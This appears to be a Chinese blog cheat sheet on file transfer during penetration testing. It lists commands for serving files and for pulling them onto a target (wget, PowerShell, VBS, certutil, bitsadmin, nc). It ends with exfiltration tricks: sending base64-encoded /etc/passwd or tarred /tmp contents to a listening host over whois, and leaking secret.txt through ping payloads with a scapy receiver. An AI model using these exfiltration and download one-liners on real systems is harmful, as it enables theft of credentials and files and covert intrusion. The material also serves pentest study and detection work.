zoukankan      html  css  js  c++  java
  • 渗透测试之文件上传与下载

    一、搭建 HTTP server提供下载

    python2

    python -m SimpleHTTPServer 1337

    python3

    python -m http.server 1337

    PHP 5.4+

    php -S 0.0.0.0:1337

    ruby

    ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start' ruby -run -e httpd . -p 1337

    Perl

    perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start' perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET /(.*) / })'
     
    busybox httpd
    busybox httpd -f -p 8000

    apache2

    /var/www/html #网站根目录 
    sudo systemctl start apache2 #开启apache2服务

    二、文件下载

    wput

    wput dir_name ftp://linuxpig:123456@host.com/

    wget

    wget http://site.com/1.rar -O 1.rar

    ariac2(需安装)

    aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

    powershell

    $p = New-Object System.Net.WebClient 
    $p.DownloadFile("http://domain/file","C:%homepath%file")

    vbs脚本

    test.vbs
    Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%file", 2 ' end with
     
    执行 :cscript test.vbs

    Perl

    test.pl
    #!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");
     
    执行:perl test.pl

    Python

    #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()
     
    执行:python test.py

    Ruby

    test.rb
    #!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
     
    执行:ruby test.rb

    PHP

    test.php
    <?php $url = 'http://www.example.com/file'; $path = '/path/to/file'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($path, $data); ?>
     
    执行:php test.php

    NC attacker

    本机 cat file | nc -l 1234 target nc host_ip 1234 > file

    FTP

    ftp 127.0.0.1 username password get file exit

    TFTP

    tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

    Bitsadmin

    bitsadmin /transfer n http://domain/file c:%homepath%file

    Window 文件共享

    net use x: 127.0.0.1share /user:example.comuserID myPassword

    SCP 本地到远程

    scp file user@host.com:/tmp

    SCP 远程到本地

    scp user@host.com:/tmp file

    rsync 远程rsync服务器中拷贝文件到本地机

    rsync -av root@192.168.78.192::www /databack

    本地机器拷贝文件到远程rsync服务器

    rsync -av /databack root@192.168.78.192::www

    certutil.exe

    certutil.exe -urlcache -split -f http://site.com/file

    copy

    copy \IPShareNamefile.exe file.exe

    WHOIS 接收端 Host B:

    nc -vlnp 1337 | sed "s/ //g" | base64 -d

    发送端 Host A:

    whois -h host_ip -p 1337 `cat /etc/passwd | base64`

    WHOIS + TAR First:

    ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
      Next
      tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
     
      Finally
      cat files.b64 | tr -d ' ' | base64 -d | tar zxv #to get the files out

    PING 发送端:

    xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

    接收端ping_receiver.py:

    ping_receiver.py
    import sys try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0) def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="") sniff(iface="eth0", prn=process_packet)
     
    python3 ping_receiver.py
  • 相关阅读:
    Linux 常用工具openssh之ssh-copy-id
    Linux 常用工具openssh之ssh-agent
    SpringMVC视图机制详解[附带源码分析]
    Spring中Ordered接口简介
    SpringMVC拦截器详解[附带源码分析]
    SpringMVC类型转换、数据绑定详解[附带源码分析]
    详解SpringMVC请求的时候是如何找到正确的Controller[附带源码分析]
    详解SpringMVC中Controller的方法中参数的工作原理[附带源码分析]
    SpringMVC关于json、xml自动转换的原理研究[附带源码分析]
    Servlet容器Tomcat中web.xml中url-pattern的配置详解[附带源码分析]
  • 原文地址:https://www.cnblogs.com/miruier/p/15024244.html
Copyright © 2011-2022 走看看